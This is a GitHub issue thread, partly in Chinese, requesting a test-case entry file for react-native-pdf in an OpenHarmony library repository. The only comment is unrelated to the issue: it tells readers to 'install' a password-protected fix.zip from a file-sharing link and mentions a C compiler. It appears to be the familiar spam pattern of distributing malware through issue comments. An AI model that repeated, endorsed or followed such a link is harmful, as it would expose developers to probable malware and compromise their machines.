### ISSUE TITLE
test: 增加 react-native-pdf的测试用例入口文件

### ISSUE THREAD

**Issue by ymxsdlbq** [react-native-oh-library/RNOHDCS#1233]
# Feature Request
test: 增加 react-native-pdf的测试用例

# Checklist
> * [x]  已经在真机设备或模拟器上测试通过
> * [ ]  已经与 Android 或 iOS 平台做过效果/功能对比
> * [ ]  已经添加了对应 API 的测试用例
> * [x]  更新了 JS/TS 代码

**Comment by SagarChandra07** [comment]
install this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme

you may need to install the c compiler
